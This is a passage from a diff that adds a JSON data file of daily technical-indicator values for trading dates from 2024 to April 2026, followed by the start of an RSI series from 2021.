31.235791601242262 + ], + [ + "2024-02-13", + 39.24338715743564 + ], + [ + "2024-02-14", + 39.11746578614477 + ], + [ + "2024-02-15", + 35.917923734883594 + ], + [ + "2024-02-16", + 31.166905927352605 + ], + [ + "2024-02-20", + 33.62859565978029 + ], + [ + "2024-02-21", + 33.805827683908745 + ], + [ + "2024-02-22", + 51.589930157655864 + ], + [ + "2024-02-23", + 51.96943531779809 + ], + [ + "2024-02-26", + 51.195834352372806 + ], + [ + "2024-02-27", + 49.90765530077111 + ], + [ + "2024-02-28", + 52.72322894795306 + ], + [ + "2024-02-29", + 43.63896594117652 + ], + [ + "2024-03-01", + 49.3960112658057 + ], + [ + "2024-03-04", + 47.92523359976597 + ], + [ + "2024-03-05", + 58.71101969581741 + ], + [ + "2024-03-06", + 59.25023850043991 + ], + [ + "2024-03-07", + 62.3893577495776 + ], + [ + "2024-03-08", + 69.15145548012278 + ], + [ + "2024-03-11", + 67.15294695489503 + ], + [ + "2024-03-12", + 71.77244350447265 + ], + [ + "2024-03-13", + 66.19522698266466 + ], + [ + "2024-03-14", + 63.95158268636432 + ], + [ + "2024-03-15", + 68.01271076617314 + ], + [ + "2024-03-18", + 73.46953707664925 + ], + [ + "2024-03-19", + 71.98578221350695 + ], + [ + "2024-03-20", + 74.08789790311396 + ], + [ + "2024-03-21", + 49.97513237645241 + ], + [ + "2024-03-22", + 49.415443124985636 + ], + [ + "2024-03-25", + 50.0203254948976 + ], + [ + "2024-03-26", + 50.48541725075728 + ], + [ + "2024-03-27", + 49.270326563392004 + ], + [ + "2024-03-28", + 47.67278520721446 + ], + [ + "2024-04-01", + 39.26080376049429 + ], + [ + "2024-04-02", + 41.619689778409224 + ], + [ + "2024-04-03", + 28.858961454057834 + ], + [ + "2024-04-04", + 37.51225135695731 + ], + [ + "2024-04-05", + 34.084293038471756 + ], + [ + "2024-04-08", + 25.443557897281423 + ], + [ + "2024-04-09", + 25.117479674854295 + ], + [ + "2024-04-10", + 19.314786808592977 + ], + [ + "2024-04-11", + 27.77985907246651 + ], + [ + "2024-04-12", + 38.26294970602047 + ], + [ + "2024-04-15", + 43.221302646261755 + ], + [ + "2024-04-16", + 39.398720048032445 + ], + [ + "2024-04-17", + 43.63870784648143 + ], + [ + "2024-04-18", + 36.823243963723264 + ], + [ + "2024-04-19", + 46.42156404400849 + ], + [ + "2024-04-22", + 52.03209066664007 + ], + [ + "2024-04-23", + 62.550293880232765 + ], + [ + "2024-04-24", + 63.491985792869066 + ], + [ + "2024-04-25", + 62.92616555216917 + ], + [ + "2024-04-26", + 72.35012701500709 + ], + [ + "2024-04-29", + 72.88144050893366 + ], + [ + "2024-04-30", + 80.1966152223058 + ], + [ + "2024-05-01", + 80.33250632202336 + ], + [ + "2024-05-02", + 80.48418429704398 + ], + [ + "2024-05-03", + 88.08782919548386 + ], + [ + "2024-05-06", + 91.56982962365691 + ], + [ + "2024-05-07", + 91.20788596956852 + ], + [ + "2024-05-08", + 89.18733882851487 + ], + [ + "2024-05-09", + 82.25404266564603 + ], + [ + "2024-05-10", + 75.01111153691778 + ], + [ + "2024-05-13", + 65.62291700329682 + ], + [ + "2024-05-14", + 66.2893594266503 + ], + [ + "2024-05-15", + 64.944593662463 + ], + [ + "2024-05-16", + 63.17409183387218 + ], + [ + "2024-05-17", + 43.34178745899963 + ], + [ + "2024-05-20", + 42.45096216245968 + ], + [ + "2024-05-21", + 37.79822773593992 + ], + [ + "2024-05-22", + 38.272000867031636 + ], + [ + "2024-05-23", + 38.02505399297456 + ], + [ + "2024-05-24", + 33.58704227260163 + ], + [ + "2024-05-28", + 33.560644202216174 + ], + [ + "2024-05-29", + 16.260610909225722 + ], + [ + "2024-05-30", + 20.353131645070768 + ], + [ + "2024-05-31", + 16.7901874294062 + ], + [ + "2024-06-03", + 0.6528772990095508 + ], + [ + "2024-06-04", + 0.0 + ], + [ + "2024-06-05", + 17.18142270709952 + ], + [ + "2024-06-06", + 17.11681945886298 + ], + [ + "2024-06-07", + 17.71749038261979 + ], + [ + "2024-06-10", + 17.785558462331053 + ], + [ + "2024-06-11", + 18.69280416826442 + ], + [ + "2024-06-12", + 23.05856412788721 + ], + [ + "2024-06-13", + 15.927055421146799 + ], + [ + "2024-06-14", + 15.121114005993116 + ], + [ + "2024-06-17", + 18.274723819796208 + ], + [ + "2024-06-18", + 18.098970842545196 + ], + [ + "2024-06-20", + 23.25326992917766 + ], + [ + "2024-06-21", + 24.304150584390204 + ], + [ + "2024-06-24", + 29.93519877146681 + ], + [ + "2024-06-25", + 31.12598536503779 + ], + [ + "2024-06-26", + 31.04320446032276 + ], + [ + "2024-06-27", + 27.38816672249436 + ], + [ + "2024-06-28", + 22.250675615079867 + ], + [ + "2024-07-01", + 21.987955949366064 + ], + [ + "2024-07-02", + 24.075746737412725 + ], + [ + "2024-07-03", + 24.90214587058923 + ], + [ + "2024-07-05", + 14.221800915211432 + ], + [ + "2024-07-08", + 13.585436307328024 + ], + [ + "2024-07-09", + 12.851637881188637 + ], + [ + "2024-07-10", + 15.06972344271771 + ], + [ + "2024-07-11", + 41.06055148359457 + ], + [ + "2024-07-12", + 36.935078803097724 + ], + [ + "2024-07-15", + 36.51448169907049 + ], + [ + "2024-07-16", + 36.25605713379721 + ], + [ + "2024-07-17", + 62.94646363917131 + ], + [ + "2024-07-18", + 63.56250603785091 + ], + [ + "2024-07-19", + 64.13853363361119 + ], + [ + "2024-07-22", + 70.52318125933667 + ], + [ + "2024-07-23", + 66.90838280737366 + ], + [ + "2024-07-24", + 97.3469201558357 + ], + [ + "2024-07-25", + 98.91968455604105 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 100.0 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 100.0 + ], + [ + "2024-08-06", + 100.0 + ], + [ + "2024-08-07", + 96.26794362825503 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.80897235202009 + ], + [ + "2024-08-12", + 99.77490923667276 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 93.07889273741615 + ], + [ + "2024-08-15", + 99.8890464357005 + ], + [ + "2024-08-16", + 99.1532991760643 + ], + [ + "2024-08-19", + 98.71279059350404 + ], + [ + "2024-08-20", + 98.62962661183401 + ], + [ + "2024-08-21", + 84.64454047420827 + ], + [ + "2024-08-22", + 86.289094418268 + ], + [ + "2024-08-23", + 86.45724151694762 + ], + [ + "2024-08-26", + 87.81864590105535 + ], + [ + "2024-08-27", + 85.34371222094858 + ], + [ + "2024-08-28", + 78.17552263664952 + ], + [ + "2024-08-29", + 71.05932434162851 + ], + [ + "2024-08-30", + 63.37808360572617 + ], + [ + "2024-09-03", + 64.53835104655278 + ], + [ + "2024-09-04", + 64.47977146670587 + ], + [ + "2024-09-05", + 62.17846699477345 + ], + [ + "2024-09-06", + 61.68210310485759 + ], + [ + "2024-09-09", + 63.41331459960915 + ], + [ + "2024-09-10", + 64.30487686330201 + ], + [ + "2024-09-11", + 62.56069149234693 + ], + [ + "2024-09-12", + 63.64614375086365 + ], + [ + "2024-09-13", + 55.59998382345033 + ], + [ + "2024-09-16", + 55.849060147651485 + ], + [ + "2024-09-17", + 53.22985465009543 + ], + [ + "2024-09-18", + 53.3801869350573 + ], + [ + "2024-09-19", + 62.21948944216567 + ], + [ + "2024-09-20", + 58.67570853905475 + ], + [ + "2024-09-23", + 57.34553252290118 + ], + [ + "2024-09-24", + 56.04325310595086 + ], + [ + "2024-09-25", + 55.995526561439846 + ], + [ + "2024-09-26", + 54.14962068362541 + ], + [ + "2024-09-27", + 54.78166694799751 + ], + [ + "2024-09-30", + 53.379095828341804 + ], + [ + "2024-10-01", + 41.25503907092099 + ], + [ + "2024-10-02", + 40.85440153573368 + ], + [ + "2024-10-03", + 40.980392329372066 + ], + [ + "2024-10-04", + 25.522784305380807 + ], + [ + "2024-10-07", + 28.166411150671404 + ], + [ + "2024-10-08", + 30.035150738995238 + ], + [ + "2024-10-09", + 23.72202496428751 + ], + [ + "2024-10-10", + 22.73322575642206 + ], + [ + "2024-10-11", + 22.624447740047422 + ], + [ + "2024-10-14", + 22.57243182273678 + ], + [ + "2024-10-15", + 27.446972122347685 + ], + [ + "2024-10-16", + 26.745657079056578 + ], + [ + "2024-10-17", + 14.038494015761705 + ], + [ + "2024-10-18", + 14.404710591764783 + ], + [ + "2024-10-21", + 14.373214036184729 + ], + [ + "2024-10-22", + 14.038389985997988 + ], + [ + "2024-10-23", + 20.063920398200704 + ], + [ + "2024-10-24", + 20.35165652090013 + ], + [ + "2024-10-25", + 20.08862255923142 + ], + [ + "2024-10-28", + 20.009479257030698 + ], + [ + "2024-10-29", + 16.02856608286724 + ], + [ + "2024-10-30", + 17.94479962926463 + ], + [ + "2024-10-31", + 32.1033942136204 + ], + [ + "2024-11-01", + 30.440004159944895 + ], + [ + "2024-11-04", + 28.24226451718826 + ], + [ + "2024-11-05", + 27.284171675339437 + ], + [ + "2024-11-06", + 39.17273306244145 + ], + [ + "2024-11-07", + 42.354533678244245 + ], + [ + "2024-11-08", + 42.35633302485019 + ], + [ + "2024-11-11", + 41.69161583432937 + ], + [ + "2024-11-12", + 38.028903317349126 + ], + [ + "2024-11-13", + 38.15770935440414 + ], + [ + "2024-11-14", + 39.50795550005767 + ], + [ + "2024-11-15", + 49.17129863695725 + ], + [ + "2024-11-18", + 49.770026777255524 + ], + [ + "2024-11-19", + 50.33979011761409 + ], + [ + "2024-11-20", + 46.19948463136561 + ], + [ + "2024-11-21", + 45.56465885874076 + ], + [ + "2024-11-22", + 45.23642934928584 + ], + [ + "2024-11-25", + 45.233411358967395 + ], + [ + "2024-11-26", + 44.41985553564106 + ], + [ + "2024-11-27", + 44.59712497426925 + ], + [ + "2024-11-29", + 32.827004426078084 + ], + [ + "2024-12-02", + 33.701089185610414 + ], + [ + "2024-12-03", + 33.05146292961065 + ], + [ + "2024-12-04", + 32.880070787576116 + ], + [ + "2024-12-05", + 20.865620808447392 + ], + [ + "2024-12-06", + 17.394648878929427 + ], + [ + "2024-12-09", + 19.14589308682635 + ], + [ + "2024-12-10", + 19.51952125994742 + ], + [ + "2024-12-11", + 25.455598871473406 + ], + [ + "2024-12-12", + 26.600487458046896 + ], + [ + "2024-12-13", + 25.69409887171305 + ], + [ + "2024-12-16", + 11.959058325729012 + ], + [ + "2024-12-17", + 13.385889633803455 + ], + [ + "2024-12-18", + 42.31143613961636 + ], + [ + "2024-12-19", + 42.82953170501135 + ], + [ + "2024-12-20", + 43.678689340483004 + ], + [ + "2024-12-23", + 44.66774265421449 + ], + [ + "2024-12-24", + 46.68967249687887 + ], + [ + "2024-12-26", + 46.66483740573024 + ], + [ + "2024-12-27", + 48.816081034703025 + ], + [ + "2024-12-30", + 51.172624226809496 + ], + [ + "2024-12-31", + 50.619088348028995 + ], + [ + "2025-01-02", + 50.47496753158398 + ], + [ + "2025-01-03", + 52.13392489877572 + ], + [ + "2025-01-06", + 53.95850848304213 + ], + [ + "2025-01-07", + 57.18445707776589 + ], + [ + "2025-01-08", + 56.53253551969589 + ], + [ + "2025-01-10", + 59.52597971930502 + ], + [ + "2025-01-13", + 54.14102773441349 + ], + [ + "2025-01-14", + 53.87879630798405 + ], + [ + "2025-01-15", + 60.983213935399284 + ], + [ + "2025-01-16", + 57.651271936814865 + ], + [ + "2025-01-17", + 62.129331763549544 + ], + [ + "2025-01-21", + 43.95847779606347 + ], + [ + "2025-01-22", + 45.61824497186116 + ], + [ + "2025-01-23", + 44.79827706338403 + ], + [ + "2025-01-24", + 44.43763910785857 + ], + [ + "2025-01-27", + 54.09566463129799 + ], + [ + "2025-01-28", + 57.72191493664614 + ], + [ + "2025-01-29", + 55.36364660063986 + ], + [ + "2025-01-30", + 52.92955178093928 + ], + [ + "2025-01-31", + 51.68836685742859 + ], + [ + "2025-02-03", + 52.72647617131302 + ], + [ + "2025-02-04", + 51.18053564025451 + ], + [ + "2025-02-05", + 49.5855025556515 + ], + [ + "2025-02-06", + 44.43064985044228 + ], + [ + "2025-02-07", + 47.379084691765485 + ], + [ + "2025-02-10", + 44.39239156366166 + ], + [ + "2025-02-11", + 44.216858699275704 + ], + [ + "2025-02-12", + 44.07495165618204 + ], + [ + "2025-02-13", + 39.47079651425187 + ], + [ + "2025-02-14", + 38.19707512616516 + ], + [ + "2025-02-18", + 34.438988256670505 + ], + [ + "2025-02-19", + 34.16442165549308 + ], + [ + "2025-02-20", + 31.901090255964142 + ], + [ + "2025-02-21", + 39.5149965695059 + ], + [ + "2025-02-24", + 41.16024468147446 + ], + [ + "2025-02-25", + 28.987096870312275 + ], + [ + "2025-02-26", + 24.37922440443064 + ], + [ + "2025-02-27", + 37.48775126215194 + ], + [ + "2025-02-28", + 41.84953802391085 + ], + [ + "2025-03-03", + 47.933039187859265 + ], + [ + "2025-03-04", + 47.464357323398325 + ], + [ + "2025-03-05", + 47.871854347282465 + ], + [ + "2025-03-06", + 55.98883974074072 + ], + [ + "2025-03-07", + 56.51931821463128 + ], + [ + "2025-03-10", + 70.12235694358287 + ], + [ + "2025-03-11", + 66.45959407104054 + ], + [ + "2025-03-12", + 69.91227189510961 + ], + [ + "2025-03-13", + 71.39659375470418 + ], + [ + "2025-03-14", + 77.04703799671016 + ], + [ + "2025-03-17", + 77.68244993436704 + ], + [ + "2025-03-18", + 78.31303655601292 + ], + [ + "2025-03-19", + 81.9986743877879 + ], + [ + "2025-03-20", + 82.0265376981951 + ], + [ + "2025-03-21", + 79.99633963372446 + ], + [ + "2025-03-24", + 86.07841396936816 + ], + [ + "2025-03-25", + 85.67311281202197 + ], + [ + "2025-03-26", + 88.23219598875212 + ], + [ + "2025-03-27", + 81.38586492747386 + ], + [ + "2025-03-28", + 83.93139511173912 + ], + [ + "2025-03-31", + 80.37864035779327 + ], + [ + "2025-04-01", + 81.5554715510053 + ], + [ + "2025-04-02", + 79.97218519736387 + ], + [ + "2025-04-03", + 100.0 + ], + [ + "2025-04-04", + 100.0 + ], + [ + "2025-04-07", + 93.87345470535809 + ], + [ + "2025-04-08", + 95.04745006897143 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 99.35323221505674 + ], + [ + "2025-04-14", + 99.37595220874506 + ], + [ + "2025-04-15", + 98.85956037837089 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 98.44854735864493 + ], + [ + "2025-04-29", + 98.51211222538431 + ], + [ + "2025-04-30", + 98.41494397292327 + ], + [ + "2025-05-01", + 98.5667477107579 + ], + [ + "2025-05-02", + 91.80285516500568 + ], + [ + "2025-05-05", + 81.21210056366091 + ], + [ + "2025-05-06", + 81.82109510365075 + ], + [ + "2025-05-07", + 80.07583393602751 + ], + [ + "2025-05-08", + 38.3238344652918 + ], + [ + "2025-05-09", + 28.579781203991388 + ], + [ + "2025-05-12", + 34.2425656291186 + ], + [ + "2025-05-13", + 34.67660113983193 + ], + [ + "2025-05-14", + 34.563666988643206 + ], + [ + "2025-05-15", + 27.54470013863935 + ], + [ + "2025-05-16", + 27.18237605756973 + ], + [ + "2025-05-19", + 20.89194858255486 + ], + [ + "2025-05-20", + 19.94778793633339 + ], + [ + "2025-05-21", + 21.295761761396705 + ], + [ + "2025-05-22", + 17.761491751189386 + ], + [ + "2025-05-23", + 18.78454262273118 + ], + [ + "2025-05-27", + 21.083557799911166 + ], + [ + "2025-05-28", + 21.57165888922821 + ], + [ + "2025-05-29", + 21.500620625697035 + ], + [ + "2025-05-30", + 21.361224869582195 + ], + [ + "2025-06-02", + 20.508931195185664 + ], + [ + "2025-06-03", + 20.02318986066853 + ], + [ + "2025-06-04", + 18.73421472038182 + ], + [ + "2025-06-05", + 19.74120069289507 + ], + [ + "2025-06-06", + 17.089258130592466 + ], + [ + "2025-06-09", + 16.97004239344638 + ], + [ + "2025-06-10", + 5.661362481484495 + ], + [ + "2025-06-11", + 4.132479092741989 + ], + [ + "2025-06-12", + 3.924800883767162 + ], + [ + "2025-06-13", + 5.821263097003383 + ], + [ + "2025-06-16", + 7.290033277150215 + ], + [ + "2025-06-17", + 8.348070165553905 + ], + [ + "2025-06-18", + 8.203346547398473 + ], + [ + "2025-06-20", + 6.419746515801106 + ], + [ + "2025-06-23", + 7.189546220307006 + ], + [ + "2025-06-24", + 7.445787914262114 + ], + [ + "2025-06-25", + 3.0068653859289736 + ], + [ + "2025-06-26", + 3.088866377922904 + ], + [ + "2025-06-27", + 3.085722802330825 + ], + [ + "2025-06-30", + 3.009713441474855 + ], + [ + "2025-07-01", + 4.055256627959344 + ], + [ + "2025-07-02", + 3.9322950944172286 + ], + [ + "2025-07-03", + 4.456779934907579 + ], + [ + "2025-07-07", + 4.386531137751305 + ], + [ + "2025-07-08", + 3.8584703611765137 + ], + [ + "2025-07-09", + 4.0953860129913755 + ], + [ + "2025-07-10", + 4.032781820092989 + ], + [ + "2025-07-11", + 3.3956825352838873 + ], + [ + "2025-07-14", + 1.9536556727898007 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.06942184329374562 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.1698823113925828 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 0.3845908275512061 + ], + [ + "2025-08-01", + 5.398080152558032 + ], + [ + "2025-08-04", + 8.493210224800741 + ], + [ + "2025-08-05", + 9.13586797780956 + ], + [ + "2025-08-06", + 10.170208730790966 + ], + [ + "2025-08-07", + 10.162931828673612 + ], + [ + "2025-08-08", + 10.587153471772721 + ], + [ + "2025-08-11", + 10.745091672024811 + ], + [ + "2025-08-12", + 11.838419312994237 + ], + [ + "2025-08-13", + 11.848776419408976 + ], + [ + "2025-08-14", + 11.563940434971846 + ], + [ + "2025-08-15", + 11.859188544031104 + ], + [ + "2025-08-18", + 11.738579120942404 + ], + [ + "2025-08-19", + 13.325402709375286 + ], + [ + "2025-08-20", + 13.548906061060478 + ], + [ + "2025-08-21", + 13.686188444851485 + ], + [ + "2025-08-22", + 15.556821886881606 + ], + [ + "2025-08-25", + 15.56418265136653 + ], + [ + "2025-08-26", + 15.648284659636854 + ], + [ + "2025-08-27", + 15.653849350082687 + ], + [ + "2025-08-28", + 15.581483889623815 + ], + [ + "2025-08-29", + 13.227024343389957 + ], + [ + "2025-09-02", + 11.130325506476938 + ], + [ + "2025-09-03", + 11.13903484261081 + ], + [ + "2025-09-04", + 10.45259178956217 + ], + [ + "2025-09-05", + 10.373920301633834 + ], + [ + "2025-09-08", + 9.810908356584012 + ], + [ + "2025-09-09", + 9.75210719880029 + ], + [ + "2025-09-10", + 8.191098776452352 + ], + [ + "2025-09-11", + 8.527500625923595 + ], + [ + "2025-09-12", + 8.67074508457734 + ], + [ + "2025-09-15", + 8.988897799490966 + ], + [ + "2025-09-16", + 9.00703361776457 + ], + [ + "2025-09-17", + 6.601217342389165 + ], + [ + "2025-09-18", + 6.386582410102664 + ], + [ + "2025-09-19", + 5.911396024082432 + ], + [ + "2025-09-22", + 4.048803762387119 + ], + [ + "2025-09-23", + 4.794966526929971 + ], + [ + "2025-09-24", + 5.184657334643114 + ], + [ + "2025-09-25", + 5.687090414444131 + ], + [ + "2025-09-26", + 5.505139967039011 + ], + [ + "2025-09-29", + 2.9103549500666035 + ], + [ + "2025-09-30", + 0.9380818932445516 + ], + [ + "2025-10-01", + 0.5798204088428086 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 0.8191728868774537 + ], + [ + "2025-10-06", + 1.167875245098653 + ], + [ + "2025-10-07", + 2.094193171615159 + ], + [ + "2025-10-08", + 3.284728085606504 + ], + [ + "2025-10-09", + 3.3252027636999575 + ], + [ + "2025-10-10", + 16.692274854683124 + ], + [ + "2025-10-13", + 19.438278402766553 + ], + [ + "2025-10-14", + 19.824000352383937 + ], + [ + "2025-10-15", + 20.025609330314122 + ], + [ + "2025-10-16", + 19.669867942910784 + ], + [ + "2025-10-17", + 19.646469307482654 + ], + [ + "2025-10-20", + 20.48327064335098 + ], + [ + "2025-10-21", + 20.087982547067895 + ], + [ + "2025-10-22", + 20.750774515018836 + ], + [ + "2025-10-23", + 20.914610357507083 + ], + [ + "2025-10-24", + 21.415773556721152 + ], + [ + "2025-10-27", + 23.025543640287214 + ], + [ + "2025-10-28", + 23.19945068859306 + ], + [ + "2025-10-29", + 23.188171823608037 + ], + [ + "2025-10-30", + 25.06707082038499 + ], + [ + "2025-10-31", + 24.8700386521057 + ], + [ + "2025-11-03", + 24.725286938798348 + ], + [ + "2025-11-04", + 27.336677399733105 + ], + [ + "2025-11-05", + 26.892393958483403 + ], + [ + "2025-11-06", + 28.986721028533196 + ], + [ + "2025-11-07", + 21.170354088997435 + ], + [ + "2025-11-10", + 21.357388888741006 + ], + [ + "2025-11-11", + 20.9948593944923 + ], + [ + "2025-11-12", + 20.848770938904217 + ], + [ + "2025-11-13", + 23.82168575413011 + ], + [ + "2025-11-14", + 23.602321227592864 + ], + [ + "2025-11-17", + 23.01094345583766 + ], + [ + "2025-11-18", + 23.797068749256177 + ], + [ + "2025-11-19", + 23.57309776334607 + ], + [ + "2025-11-20", + 26.136481846899212 + ], + [ + "2025-11-21", + 25.73485620228026 + ], + [ + "2025-11-24", + 27.84874036001228 + ], + [ + "2025-11-25", + 27.691819495249153 + ], + [ + "2025-11-26", + 28.12094926926277 + ], + [ + "2025-11-28", + 27.397287127789934 + ], + [ + "2025-12-01", + 27.245134350550455 + ], + [ + "2025-12-02", + 27.504292834939985 + ], + [ + "2025-12-03", + 25.126021319284053 + ], + [ + "2025-12-04", + 24.88098935072809 + ], + [ + "2025-12-05", + 22.60260816499212 + ], + [ + "2025-12-08", + 22.532421497446194 + ], + [ + "2025-12-09", + 19.399442791728383 + ], + [ + "2025-12-10", + 19.428157621377068 + ], + [ + "2025-12-11", + 19.5100021600735 + ], + [ + "2025-12-12", + 19.200249193627734 + ], + [ + "2025-12-15", + 19.400357475724057 + ], + [ + "2025-12-16", + 18.841963536890283 + ], + [ + "2025-12-17", + 20.350655001372154 + ], + [ + "2025-12-18", + 21.476585635049403 + ], + [ + "2025-12-19", + 17.746094385419827 + ], + [ + "2025-12-22", + 17.59196472653511 + ], + [ + "2025-12-23", + 13.091245302812831 + ], + [ + "2025-12-24", + 12.898512011055635 + ], + [ + "2025-12-26", + 12.356587109619728 + ], + [ + "2025-12-29", + 12.181264985489161 + ], + [ + "2025-12-30", + 12.149031244403483 + ], + [ + "2025-12-31", + 12.189743825013798 + ], + [ + "2026-01-02", + 12.119969776381033 + ], + [ + "2026-01-05", + 12.81081508684766 + ], + [ + "2026-01-06", + 13.402356151887595 + ], + [ + "2026-01-07", + 13.37914369355087 + ], + [ + "2026-01-08", + 13.647880845624108 + ], + [ + "2026-01-09", + 14.363898497049876 + ], + [ + "2026-01-12", + 14.283218240850912 + ], + [ + "2026-01-13", + 10.58732805876439 + ], + [ + "2026-01-14", + 11.53456341756636 + ], + [ + "2026-01-15", + 11.588382689313802 + ], + [ + "2026-01-16", + 7.52526400639489 + ], + [ + "2026-01-20", + 10.638381751574578 + ], + [ + "2026-01-21", + 10.673862771310596 + ], + [ + "2026-01-22", + 11.014976122374128 + ], + [ + "2026-01-23", + 10.885527914356915 + ], + [ + "2026-01-26", + 10.999364305986232 + ], + [ + "2026-01-27", + 11.71477208588749 + ], + [ + "2026-01-28", + 11.468080722832296 + ], + [ + "2026-01-29", + 11.807354046634764 + ], + [ + "2026-01-30", + 12.551515967409859 + ], + [ + "2026-02-02", + 12.802505026743349 + ], + [ + "2026-02-03", + 14.55371525219805 + ], + [ + "2026-02-04", + 16.087252425262303 + ], + [ + "2026-02-05", + 17.22315634969009 + ], + [ + "2026-02-06", + 20.7433484352128 + ], + [ + "2026-02-09", + 20.462245777469914 + ], + [ + "2026-02-10", + 20.517784889384505 + ], + [ + "2026-02-11", + 20.61297474802071 + ], + [ + "2026-02-12", + 22.490833378067517 + ], + [ + "2026-02-13", + 22.384448832370364 + ], + [ + "2026-02-17", + 22.389162448866962 + ], + [ + "2026-02-18", + 20.087237676024785 + ], + [ + "2026-02-19", + 18.764263621755063 + ], + [ + "2026-02-20", + 18.89750835474918 + ], + [ + "2026-02-23", + 19.58826660656518 + ], + [ + "2026-02-24", + 20.41659603897705 + ], + [ + "2026-02-25", + 21.33494325384257 + ], + [ + "2026-02-26", + 21.87763883097989 + ], + [ + "2026-02-27", + 21.784956046656703 + ], + [ + "2026-03-02", + 21.066557372139393 + ], + [ + "2026-03-03", + 21.148007723018093 + ], + [ + "2026-03-04", + 21.562548976379816 + ], + [ + "2026-03-05", + 19.50800314203519 + ], + [ + "2026-03-06", + 19.706414738600007 + ], + [ + "2026-03-09", + 17.784665300831332 + ], + [ + "2026-03-10", + 17.29035770017302 + ], + [ + "2026-03-11", + 17.158040501053357 + ], + [ + "2026-03-12", + 19.043115091012567 + ], + [ + "2026-03-13", + 16.396045151756322 + ], + [ + "2026-03-16", + 17.420212666071418 + ], + [ + "2026-03-17", + 17.607280254661408 + ], + [ + "2026-03-18", + 18.61157559967652 + ], + [ + "2026-03-19", + 18.582340308339525 + ], + [ + "2026-03-20", + 20.058891285445124 + ], + [ + "2026-03-23", + 20.539097941432246 + ], + [ + "2026-03-24", + 19.69271968953864 + ], + [ + "2026-03-25", + 18.309129261679015 + ], + [ + "2026-03-26", + 20.92044426635186 + ], + [ + "2026-03-27", + 22.739237876726456 + ], + [ + "2026-03-30", + 22.64322709799623 + ], + [ + "2026-03-31", + 30.252546707515666 + ], + [ + "2026-04-01", + 29.80789904798464 + ], + [ + "2026-04-02", + 29.847831656307065 + ], + [ + "2026-04-06", + 29.117298681369242 + ], + [ + "2026-04-07", + 27.98574796288593 + ], + [ + "2026-04-08", + 32.83134955644584 + ], + [ + "2026-04-09", + 33.05449216044124 + ], + [ + "2026-04-10", + 31.426697975187267 + ], + [ + "2026-04-13", + 31.476381311833833 + ], + [ + "2026-04-14", + 32.38748836750661 + ], + [ + "2026-04-15", + 33.03069065728456 + ], + [ + "2026-04-16", + 31.44720527221653 + ], + [ + "2026-04-17", + 31.576710225570153 + ], + [ + "2026-04-20", + 28.782664153972863 + ], + [ + "2026-04-21", + 28.976752998950616 + ], + [ + "2026-04-22", + 28.838529057833867 + ], + [ + "2026-04-23", + 29.495708464993054 + ] + ], + "rsi": [ + [ + "2021-04-01", + 50.0 + ], + [ + "2021-04-05", + 50.0 + ], + [ + "2021-04-06", + 99.72777901255112 + ], + [ + "2021-04-07", + 99.7305275495297 + ], + [ + "2021-04-08", + 99.74263052151944 + ], + [ + "2021-04-09", + 99.74973265449688 + ], + [ + "2021-04-12", + 99.11139853730353 + ], + [ + "2021-04-13", + 99.16292904012131 + ], + [ + "2021-04-14", + 93.11125152282622 + ], + [ + "2021-04-15", + 93.63303359436226 + ], + [ + "2021-04-16", + 93.67351684548501 + ], + [ + "2021-04-19", + 88.91043980928049 + ], + [ + "2021-04-20", + 85.22757417189759 + ], + [ + "2021-04-21", + 85.95795603288563 + ], + [ + "2021-04-22", + 79.9152080216298 + ], + [ + "2021-04-23", + 81.37040821632328 + ], + [ + "2021-04-26", + 82.10176251884505 + ], + [ + "2021-04-27", + 79.841301256602 + ], + [ + "2021-04-28", + 78.04319138415893 + ], + [ + "2021-04-29", + 78.59396385955482 + ], + [ + "2021-04-30", + 74.89567636170723 + ], + [ + "2021-05-03", + 71.95274053598013 + ], + [ + "2021-05-04", + 62.992945732148456 + ], + [ + "2021-05-05", + 61.48015663825001 + ], + [ + "2021-05-06", + 63.584197258570065 + ], + [ + "2021-05-07", + 65.768352727742 + ], + [ + "2021-05-10", + 54.68575541856089 + ], + [ + "2021-05-11", + 54.161729413584425 + ], + [ + "2021-05-12", + 45.39591677141548 + ], + [ + "2021-05-13", + 48.03138797395552 + ], + [ + "2021-05-14", + 54.793347356128244 + ], + [ + "2021-05-17", + 52.71869266961082 + ], + [ + "2021-05-18", + 50.443616042244344 + ], + [ + "2021-05-19", + 50.82957617272382 + ], + [ + "2021-05-20", + 56.924612557081105 + ], + [ + "2021-05-21", + 54.791314738229154 + ], + [ + "2021-05-24", + 59.70584454421322 + ], + [ + "2021-05-25", + 60.09647365462783 + ], + [ + "2021-05-26", + 61.12025703802259 + ], + [ + "2021-05-27", + 59.3531328327564 + ], + [ + "2021-05-28", + 60.38912424429294 + ], + [ + "2021-06-01", + 58.68614621320755 + ], + [ + "2021-06-02", + 59.408027086765074 + ], + [ + "2021-06-03", + 53.9852010514837 + ], + [ + "2021-06-04", + 60.285679395340665 + ], + [ + "2021-06-07", + 61.3046199293574 + ], + [ + "2021-06-08", + 61.474900373046154 + ], + [ + "2021-06-09", + 61.56595270698775 + ], + [ + "2021-06-10", + 65.42818316294395 + ], + [ + "2021-06-11", + 66.35148579852415 + ], + [ + "2021-06-14", + 69.56735558362946 + ], + [ + "2021-06-15", + 64.96656516010103 + ], + [ + "2021-06-16", + 62.49367104600236 + ], + [ + "2021-06-17", + 67.15711597089928 + ], + [ + 